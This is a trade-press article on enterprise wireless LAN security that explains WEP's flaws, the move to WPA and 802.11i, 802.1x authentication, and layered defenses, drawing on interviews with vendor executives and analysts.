Making Sense of Evolving WLAN Standards, Part 1: Security

By Jeff Vance

(Back to article)

Considering that Wi-Fi started out as a home networking technology, is it any surprise that network managers are confused about how to deploy enterprise-grade wireless LANs?

Recent studies from market research firms such as IDC and ForceNine Consulting show that while there is a good deal of optimism concerning the future ubiquity of WLANs in the corporate world, large deployments are still predominantly limited to the vertical markets of health care and education. To make matters worse, as the industry begins to standardize on enterprise-class protocols, the very standards promising to bring order to wireless are adding to the confusion because they are continually in flux.

"It's important to remember that the wireless LAN enterprise market is just now reaching the phase of broad market adoption," said Paul DeBeasi, vice president of Marketing at WLAN switch vendor Legra Systems. "To build an enterprise-class WLAN, you have to start with traditional networking technology and integrate that with both radio and security technology. Of course, there are standards for all three of these, but can you be sure that they will all work well together? For customers, the key issue isn't deciding which of the various protocols are best, so much as figuring out how they'll go about integrating them all."

Why Are Enterprises so Skittish?

ForceNine recently polled 50+ CIOs to analyze WLAN momentum in the U.S. corporate market. They found that there are a number of barriers to WLAN adoption in the enterprise, including concerns about cost, interoperability, standards, and security. "While enterprise CIOs have a number of worries when it comes to wireless, their number one concern, overwhelmingly, centers on security," said Dr. Sam Book, a partner at ForceNine.

Since security was a much lower concern in the home market, issues of encryption and authentication were initially given a low priority. Now, as WLANs are poised to take over the enterprise market, their lack of enterprise class capabilities is slowing them down a bit. Due to the early problems of WEP, which was based on a weak encryption scheme, WLAN vendors are being forced to re-evangelize the advantages of mobility, while assuring potential customers that those highly publicized security flaws have gone away.

"Many potential enterprise customers still have a WEP-centric view of the WLAN world," Book noted. "They don't yet understand that the security problems of WEP have been addressed with new and better protocols such as WPA and the forthcoming 802.11i."

"The problems associated with WEP clearly set the industry back," DeBeasi concurred. "There's no question about that. What's being overlooked, however, is the fact that WLAN technology is moving through a period of rapid innovation, and we're getting closer and closer to making the wireless LAN experience more like that of a wired LAN. Once you achieve a reasonable level of wireless dependability, which I would argue is happening as we speak, the benefits of mobility hit a tipping point, far outweighing outdated security worries."

The initial WLAN security protocol, WEP (Wired Equivalent Privacy) , utilized static keys as part of its encryption methodology, which made it relatively easy to intercept enough packets to discern the key and crack the coded traffic. Once enterprising hackers discovered this flaw, they developed automated cracking programs like WEPCrack and AirSnort, which soon thereafter hit the Internet and gave even unsophisticated hackers the tools they needed to crack just about any WEP-based WLAN.

Wired Versus Wireless Security

This bad-security timeline is by no means unique to wireless networks. If you recall the major Denial of Service (DoS) attacks on major Web sites of a few years ago, that security story unfolded in a very similar fashion. DoS attacks were so easily executed that barely literate script kiddies were able to bring down the sites. Now programs like AirSnort have given rise to the new "war-driving" phenomena, with unsophisticated crackers driving around looking for WLAN networks to break into ("true" wardrivers would argue they don't break in to open networks, they catalog open access points to bring attention to WLAN security needs).

Whether they're broken into or not, discovering open access is generally a simple matter since many WLAN deployments leave both encryption and authentication features turned off -- the equivalent of leaving your car doors unlocked and the keys in the ignition.

Giving credit where credit it due, the WLAN industry moved quickly to address the problems of WEP, responding with a more robust encryption scheme, Wi-Fi Protected Access (WPA), which was released in October 2002. While WPA retains the same RC4 cipher as WEP, for backwards compatibility, it eliminates the use of static keys, instead relying on the dynamic rekeying enabled by Temporal Key Integrity Protocol (TKIP) encryption.

WPA is only an interim protocol, a pared down version of the pending 802.11i protocol.

When asked when 802.11i will be available, Dave Juitt, CTO and chief security architect at Bluesocket, says: "Let me give you a wise-guy answer," Juitt said. "802.11i is due out in early 2003."

If 802.11i's arrival is way past due, even if the technology is ready, is approving new wireless encryption standards now a political rather than a technical issue?

"At this point, I'm not sure if it's political or just bureaucratic," Juitt said.

As of now, 802.11i is still winding its way through the cumbersome IEEE (Institute of Electrical and Electronics Engineers) ratification process, although some vendors claim to have 802.11i equipment already available. Without 802.11i being standardized, though, there's no way to know whether or not this gear will comply completely with the eventual ratified version.

According to Legra's DeBeasi, network security by no means ends with OSI Layer 2 encryption. For WLANs, that's just the basic foundation. User authentication is also a critical component for WLAN security, which was one of the gaps found in WEP."

Standards Can't Plug Every Security Hole

It's important to distinguish here between what vendors should be responsible for and where customer accountability comes in. Remember, many of the crackable WLANs out there are easily cracked because encryption and authentication of any flavor are turned off. You can't blame the bank-vault manufacturer if the bank manager never locks the vault because he doesn't want to bother memorizing the combination.

Even so, because of the hysteria surrounding wireless security, vendors are addressing the lazy-bank-manager problem by centralizing security into the core of the network, moving it away from access points and into a single, centralized appliance, such as a WLAN switch.

However, then you have yet another problem: your APs may have enough information in them to put your network at risk.

"Access points are inherently vulnerable because they are not physically secure. A savvy hacker or a smart disgruntled employ could guess the AP password and modify security settings to allow open network access," DeBeasi said. "A switch raises the bar because it requires more sophisticated control protocols such as SNMP version 3."

Bluesocket's Juitt says, "Both WPA and 802.11i should provide reasonable Layer 2 security, but any security professional with an ounce of sense will tell you that secure networks, be they wired or wireless, are based on a layered security architecture. You begin with the underlying Layer 2 protocols and build up from there. In some deployments, a Layer 2 solution is enough. In others, you may want to add Layer 3 security, perhaps IPSec, on top of that."

A common method for strengthening WLANs beyond Layer 2 encryption is to utilize an existing wired standard such as IPSec and run virtual private network (VPN) tunnles over your WLAN. However, VPNs are notorious for being complex and management intensive. Moreover, since VPNs provide Layer 3 security, they are still vulnerable to Layer 2 attacks. With a Layer 3 security solution, any node trying to access the network must do so by being granted Layer 2 access to begin with. With the data link unprotected, an attacker can see MAC addresses , associate with Access Points, and receive an IP address from the Dynamic Host Configuration Protocol (DHCP) server. Of course, much of the problem here stems from the fact that IPSec is intended as a point-to-point protocol, while WLANs are broadcast networks.

In contrast to IPSec, both WPA and 802.11i encrypt traffic and enforce user authentication at layer 2 using IEEE 802.1x. IEEE 802.1x uses EAP (Extensible Authentication Protocol) to provide the ability to conduct centralized authentication and dynamic key exchange. EAP packets are carried at the MAC layer over the WLAN and are then forwarded to the RADIUS server by the WLAN switch/AP. 802.1x also enables centralized policy control, so session time-outs can be enforced and automatic key redistribution can be mandated.

Security Is a Moving Target

This whole issue of strong-enough WLAN security standards reminds me of several conversations I've had with security guru Bruce Schneier, founder and CTO of Counterpane Internet Security and author of several books on security, including Secrets & Lies: Digital Security in a Networked World. You can't have a conversation with Schneier without hearing two security refrains repeated over and over: "Security is a process, not a product," and "Security is a moving target." In other words, there is human intelligence involved with any type of network attack, so those attacks constantly evolve. Products can address known vulnerabilities, but they tend to be blindsided by innovative attack methods.

While it would be foolish to believe that wireless security issues will ever be solved, I have noticed lately that my discussions about WLAN security are strikingly similar to the conversations I was having a couple of years ago about wired Internet security. In other words, the security gap between the two is rapidly closing (you could argue it has closed already). Instead of worrying about security holes you can drive a truck through (like WEP), the industry is beginning to worry about more savvy, creative, and sophisticated security issues. If you have an 802.11i- or WPA-compliant WLAN that centralizes authentication and policy procedures, then wireless security is no longer an issue of wireless security, but simply of network security.

(Part Two of this article will investigate the issues that arise once security concerns have been taken off the table. Which version of radio technology should you commit to -- 802.11a, b, or g? And once the client-to-radio communication is addressed, how then should your radios communicate back to your centralized WLAN appliance?)

Jeff Vance is a technology writer and consultant. He was previously the editor of Mobile Internet Times and E-Infrastructure Times, before striking out as a freelance writer. He now focuses on high-tech trends in wireless, next-generation networking, and Internet infrastructure. His articles have appeared or are forthcoming in Network World, Wi-Fi Planet, DeviceTop.com, SearchNetworking.com, and Telecom Trends, among others. You can contact him at mjwvance@zoomInternet.net.